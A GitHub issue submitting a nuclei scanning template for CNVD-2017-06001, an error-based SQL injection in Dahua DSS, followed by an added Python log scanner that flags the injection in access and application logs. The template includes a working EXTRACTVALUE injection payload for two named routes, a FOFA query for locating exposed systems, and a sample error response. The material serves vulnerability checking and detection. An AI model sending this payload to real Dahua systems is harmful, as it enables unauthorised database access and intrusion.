projectdiscovery / nuclei-templates

Community curated list of templates for the nuclei engine to find security vulnerabilities.

Home Page:https://github.com/projectdiscovery/nuclei

[nuclei-template] CNVD-2017-06001 Dahua DSS SQL injection

shibeta opened this issue · comments

Template Information:

Dahua DSS Digital Surveillance System is a security video monitoring system developed by Dahua.

A SQL injection vulnerability exists within Dahua DSS. Attackers can send specially crafted data packets to the attachment_clearTempFile.action or attachment_getAttList.action route, exploiting error-based injection to acquire sensitive information from the database. Beyond obtaining information from the database such as administrator credentials and personal information of users on the site, attackers could potentially write trojans to the server with sufficient privileges and further gain system-level access.

Relevant vulnerability ID: CNVD-2017-06001

Nuclei Template:

id: CNVD-2017-06001

info:
  name: error-based SQL Injection in Dahua DSS
  author: napgh0st
  tags: cnvd,cnvd2017,sql-injection,dahua
  reference: https://www.cnvd.org.cn/flaw/show/CNVD-2017-06001
  severity: high
  metadata:
    fofa-query: app="dahua-DSS"

variables:
  random_num: "{{rand_int(10000, 99999)}}"
  random_text: "{{rand_base(5)}}"
  payload: "{{rand_int(800000, 999999)}}"
  poc: "1') AND EXTRACTVALUE({{random_num}},CONCAT(0x5c,(SELECT (ELT({{random_num}}={{random_num}},{{payload}}))),0x5c)) AND ('{{random_text}}'='{{random_text}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/portal/attachment_clearTempFile.action?bean.RecId={{poc}}&bean.TabName=1"
      - "{{BaseURL}}/portal/attachment_getAttList.action?bean.RecId={{poc}}&bean.TabName=1"

    stop-at-first-match: true

    matchers:
      - type: word
        part: body
        condition: and
        words:
          - "XPATH syntax error"
          - "{{payload}}"

valid match response snippet:

org.springframework.jdbc.UncategorizedSQLException: PreparedStatementCallback; uncategorized SQLException for SQL [select * from C_ATTACHMENT t where 1=1 and t.tab_Name=?   and t.rec_Id in('1') AND EXTRACTVALUE(32776,CONCAT(0x5c,(SELECT (ELT(32776=32776,909836))),0x5c)) AND ('6jQ6F'='6jQ6F')   and t.tmp_flag = ?]; SQL state [HY000]; error code [1105]; XPATH syntax error: '\909836\'; nested exception is java.sql.SQLException: XPATH syntax error: '\909836\'
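For defenders who cannot patch immediately, the template above gives two observable signals: on the request side, a `bean.RecId` parameter on the two attachment routes that is not a plain numeric record id (the exploit needs a quote, a parenthesis and a MySQL error-raising function such as `EXTRACTVALUE`), and on the response side, the `XPATH syntax error: '\<value>\'` text that leaks the injected value. The following script is an added example, not part of the issue or of the nuclei project; it assumes the web server writes Combined Log Format and that legitimate `bean.RecId` values are purely numeric (an assumption about the DSS application, not something the advisory states). The sample log lines are constructed.

```python
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Routes named in the advisory and in the template above.
DSS_ATTACHMENT_ROUTES = (
    "/portal/attachment_clearTempFile.action",
    "/portal/attachment_getAttList.action",
)

# Assumption: a legitimate record id is a plain integer.
RECID_OK = re.compile(r"^\d+$")

# MySQL functions typical of error-based extraction; EXTRACTVALUE is the one the template uses.
ERROR_BASED_FUNCS = re.compile(r"\b(EXTRACTVALUE|UPDATEXML|ELT)\s*\(", re.IGNORECASE)

# Combined Log Format: ip ident user [timestamp] "METHOD target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Response-side indicator the template's matcher keys on: XPATH syntax error: '\<value>\'
XPATH_LEAK = re.compile(r"XPATH syntax error: '\\([^'\\]*)\\'")


def classify_request(target: str) -> Optional[dict]:
    """Return a finding dict for a suspicious attachment-route request, else None."""
    parts = urlsplit(target)
    if parts.path not in DSS_ATTACHMENT_ROUTES:
        return None
    rec_ids = parse_qs(parts.query).get("bean.RecId")
    if not rec_ids:
        return None
    rec_id = rec_ids[0]  # parse_qs has already URL-decoded the value
    if RECID_OK.match(rec_id):
        return None
    reason = "error-based-sqli" if ERROR_BASED_FUNCS.search(rec_id) else "malformed-recid"
    return {"route": parts.path, "rec_id": rec_id, "reason": reason}


def scan_access_log(text: str) -> list:
    """Scan Combined Log Format lines and return findings with source IP and status."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        finding = classify_request(m.group("target"))
        if finding:
            finding.update(ip=m.group("ip"), status=int(m.group("status")))
            findings.append(finding)
    return findings


def leaked_value(app_log_text: str) -> Optional[str]:
    """Return the value echoed back through the XPATH error, i.e. proof the injection executed."""
    m = XPATH_LEAK.search(app_log_text)
    return m.group(1) if m else None


# Constructed sample: one benign request, one error-based probe (the template's payload,
# URL-encoded, with fixed random values), one malformed id, one unrelated route.
SAMPLE_ACCESS_LOG = """\
203.0.113.10 - - [10/Oct/2023:13:55:36 +0000] "GET /portal/attachment_getAttList.action?bean.RecId=1234&bean.TabName=1 HTTP/1.1" 200 512
203.0.113.11 - - [10/Oct/2023:13:55:37 +0000] "GET /portal/attachment_clearTempFile.action?bean.RecId=1%27%29+AND+EXTRACTVALUE%281%2CCONCAT%280x5c%2C%28SELECT+%28ELT%281%3D1%2C999999%29%29%29%2C0x5c%29%29+AND+%28%27a%27%3D%27a&bean.TabName=1 HTTP/1.1" 500 2048
203.0.113.12 - - [10/Oct/2023:13:55:38 +0000] "GET /portal/attachment_getAttList.action?bean.RecId=12%27&bean.TabName=1 HTTP/1.1" 500 1024
198.51.100.5 - - [10/Oct/2023:13:55:39 +0000] "GET /portal/index.action HTTP/1.1" 200 4096
"""

# Constructed application-log excerpt built from the response snippet in the issue.
SAMPLE_APP_LOG = (
    "org.springframework.jdbc.UncategorizedSQLException: ... SQL state [HY000]; "
    "error code [1105]; XPATH syntax error: '\\909836\\'"
)

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"{f['ip']} {f['route']} status={f['status']} {f['reason']}: {f['rec_id']!r}")
    print("leaked value:", leaked_value(SAMPLE_APP_LOG))
```

Pairing the two checks is the useful part: a request flagged `error-based-sqli` that also returned HTTP 500, with a matching `XPATH syntax error` in the application log, is a confirmed exploitation, not just a scan. Because `parse_qs` decodes the query, the rules are applied to the same string the application saw, which is what a WAF rule written against the raw encoded URL tends to miss.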

Hello @shibeta, thank you so much for sharing this template with the community and contributing to this project 🍻

You can grab some cool PD stickers over here http://nux.gg/stickers 😄